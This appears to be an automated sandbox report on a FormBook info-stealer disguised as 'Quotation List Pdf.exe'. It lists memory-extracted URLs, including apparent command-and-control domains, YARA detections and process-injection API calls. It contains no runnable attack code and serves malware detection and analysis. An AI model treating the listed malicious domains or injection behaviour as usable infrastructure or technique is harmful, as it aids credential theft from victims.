64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0-beta+sha-d033abax-version: d033abax-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Mon, 01 Jul 2024 13:46:55 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html;charset=utf-8content-length: 964vary: Accept-Encodingserver: DPS/2.0.0-beta+sha-d033abax-version: d033abax-siteid: us-east-1set-cookie: dps_site_id=us-east-1; path=/date: Mon, 01 Jul 2024 13:46:57 GMTkeep-alive: timeout=5connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74
            Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3302954162.0000000005286000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ajjmamlllqqq.xyz
            Source: tiwTBKVufjvhPL.exe, 00000009.00000002.3302954162.0000000005286000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ajjmamlllqqq.xyz/5lw2/
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Quotation List Pdf.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
            Source: Quotation List Pdf.exeString found in binary or memory: https://aka.ms/nativeaot-c
            Source: Quotation List Pdf.exe, 00000000.00000002.1463328597.00007FF76857B000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: Quotation List Pdf.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: Quotation List Pdf.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: PING.EXE, 00000007.00000003.1737775029.00000000084B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033aFR
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: PING.EXE, 00000007.00000002.3297913979.00000000030EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: PING.EXE, 00000007.00000002.3302803643.000000000560A000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3302803643.0000000005154000.00000004.10000000.00040000.00000000.sdmp, PING.EXE, 00000007.00000002.3304846413.0000000006A90000.00000004.00000800.00020000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.000000000430A000.00000004.00000001.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.0000000003E54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://track.uc.cn/collect
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: PING.EXE, 00000007.00000002.3302803643.00000000044C4000.00000004.10000000.00040000.00000000.sdmp, tiwTBKVufjvhPL.exe, 00000009.00000002.3300284102.00000000031C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.1846037806.0000000023104000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.evoolihubs.shop/z6sg/?hv=zih0DoxsYMMKz8ZABxgT1WFK2McCJpyMbPq/OME2Y84w2Vm66kFudiKZ8IXY1l1
            Source: PING.EXE, 00000007.00000003.1741651014.0000000008588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1557293648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3299718726.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3299617930.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1557934690.0000000007A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3297787952.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1557553662.0000000005780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3302954162.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Quotation List Pdf.exe
            Uses regedit.exe to modify the Windows registry
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0042B323 NtClose,5_2_0042B323
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058535C0 NtCreateMutant,LdrInitializeThunk,5_2_058535C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_05852DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05852C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852B60 NtClose,LdrInitializeThunk,5_2_05852B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05854650 NtSuspendThread,5_2_05854650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853090 NtSetValueKey,5_2_05853090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853010 NtOpenDirectoryObject,5_2_05853010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05854340 NtSetContextThread,5_2_05854340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852DB0 NtEnumerateKey,5_2_05852DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852DD0 NtDelayExecution,5_2_05852DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852D00 NtSetInformationFile,5_2_05852D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852D10 NtMapViewOfSection,5_2_05852D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853D10 NtOpenProcessToken,5_2_05853D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852D30 NtUnmapViewOfSection,5_2_05852D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05853D70 NtOpenThread,5_2_05853D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852CA0 NtQueryInformationToken,5_2_05852CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852CC0 NtQueryVirtualMemory,5_2_05852CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852CF0 NtOpenProcess,5_2_05852CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852C00 NtQueryInformationProcess,5_2_05852C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852C60 NtCreateKey,5_2_05852C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852F90 NtProtectVirtualMemory,5_2_05852F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852FA0 NtQuerySection,5_2_05852FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852FB0 NtResumeThread,5_2_05852FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852FE0 NtCreateFile,5_2_05852FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852F30 NtCreateSection,5_2_05852F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852F60 NtCreateProcessEx,5_2_05852F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852E80 NtReadVirtualMemory,5_2_05852E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852EA0 NtAdjustPrivilegesToken,5_2_05852EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852EE0 NtQueueApcThread,5_2_05852EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852E30 NtWriteVirtualMemory,5_2_05852E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058539B0 NtGetContextThread,5_2_058539B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852B80 NtQueryInformationFile,5_2_05852B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852BA0 NtEnumerateValueKey,5_2_05852BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852BE0 NtQueryValueKey,5_2_05852BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852BF0 NtAllocateVirtualMemory,5_2_05852BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852AB0 NtWaitForSingleObject,5_2_05852AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852AD0 NtReadFile,5_2_05852AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05852AF0 NtWriteFile,5_2_05852AF0
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03884340 NtSetContextThread,LdrInitializeThunk,7_2_03884340
            Source: C:\Windows\SysWOW64\PING.EXECode function: 7_2_03884650 NtSuspendThread,LdrInitializeThunk,7_2_03884650
